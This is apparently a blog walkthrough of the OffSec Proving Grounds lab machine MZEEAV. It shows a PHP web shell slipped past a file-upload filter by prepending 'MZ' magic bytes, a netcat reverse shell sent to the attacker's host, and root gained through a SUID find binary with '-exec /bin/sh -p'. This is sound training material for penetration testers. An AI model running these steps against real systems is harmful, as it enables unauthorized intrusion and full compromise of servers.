MZEEAV Offsec Proving Grounds Practice Labor Day CTF Machine Walkthrough

enumerate harder, check the code! There is a binary file looks pretty familiar.

Photo by Ed Hardie on Unsplash

Enumeration

sudo nmap -p- -Pn -v $ip -sS -A -T 4 -oN nmap_sS.txt

Port 22 and 80 open.

Port 80

A mzee-av website

Google “mzee-av exploit” but does not seem to have any relevant info. Then tried to upload a txt file and it redirect us to a listing page, we don’t see our uploaded file there. We then tried to upload a php file, it pop upload successful but we don’t see our php file in the listing page.

Run dirsearch -u http://$ip -o dirsearch.txt and we discover /backups and /upload.

The idea what I can think of is upload a php reverse shell and gain initial foothold. But the file upload seems strange.

The backup file

Checking the /backups URL. A backup.zip file. Download and extract it unzip backup.zip.

backups directory listing

From the files, it seems like the exact same web site as what we browse earlier. Checking the upload.php, maybe we can figure out how the upload function works that allow us upload a php reverse shell.

We discover the file upload validation where it check magizbytes for PEFILE. Below explain how the upload validation code works.

#Opens the file that's been uploaded to the temporary location for reading
$F=fopen($tmp_location,"r");

#Reads the first two bytes of the uploaded file.
$magic=fread($F,2);

#Closes the file handle
fclose($F);

#Converts the binary data $magic into a hexadecimal string using bin2hex().
$magicbytes = strtoupper(substr(bin2hex($magic),0,4)); 

#logging
error_log(print_r("Magicbytes:" . $magicbytes, TRUE));

/* if its not a PEFILE block it - str_contains onlz php 8*/
//if ( ! (str_contains($magicbytes, '4D5A'))) {

#Searches for '4D5A' within the string $magicbytes. If '4D5A' is not found, strpos() will return false.
if ( strpos($magicbytes, '4D5A') === false ) {
        echo "Error no valid PEFILE\n";
        error_log(print_r("No valid PEFILE", TRUE));
        error_log(print_r("MagicBytes:" . $magicbytes, TRUE));
        exit ();
}

#If true, it will rename the file to it's original uploaded name
rename($tmp_location, $location);

From the code, if we want the uploaded file remain it name, we need to bypass the restriction. As it use bin2hex to convert the first 2 bytes of the uploaded file and check if it is 4D5A, we can use online decoder here to decode it. We will get the result as MZ. Or if you familiar with PE files, you will know the first 2 bytes is MZ, or 0x4D 0x5A.

File Upload Bypass

Open burp and intercept the upload request. We going to upload a web shell here, you can use a 1 liner or from pentest monkey.

sample 1 liner, medium block me to write this as content =(

uploading web shell

Add MZ at the beginning of the file you going to upload. Then check http://$TargetIP/upload/the_reverse_shell_name.php

The web shell I uploaded, and execute id as cmd.

If you are using pentest monkey, remember to change the listenning IP and port, and setup netcat listener before browsing the file you uplaoded.

For my case, I just nc -nlvp 80 and execute nc $kaliIP 80 -e /bin/bash at the web shell.

reverse shell gain.

Privilege Escalation

By checking SUID find / -perm /4000 2>/dev/null, we saw a file at /opt. As we know, /opt is add on software or package.

Checking the binary file

Checking the file via ls -al, we can only execute the file. Try to execute the file, it just recursive list all file in current directory. We even try enter /root and it able to list all file at /root directory.

Listing root directory

Then we tried /opt/fileS /root|id , it manage to execute the id command but as www-data. The target machine does not have straces, gdb, strings installed that allow us to further understand how the binary works.

I tried /opt/fileS -h to try our luck if can get some guideline or help command to better understand how the binary works.

In the end, I manage to get help menu via /opt/fileS --help.

Help menu

Looks like we can use -exec to execute command. When we try /opt/fileS -exec id, it return error missing argument. After a few try still does not works.

Decide to check --version if there is potential exploit.

version

It is a find binary! Everything is clear now. By checking GTFObin , we can execute command with find + SUID. Execute /opt/fileS . -exec /bin/sh -p \;

Rooted !

💡If you are familiar with find help menu, when you see the --help result, more or less you know is a find binary.

Congratz !! Hope you learn something from this walkthrough. Check out my stories for other proving grounds machine walkthroughs. Leave a comment if you found another way to pawn this machine.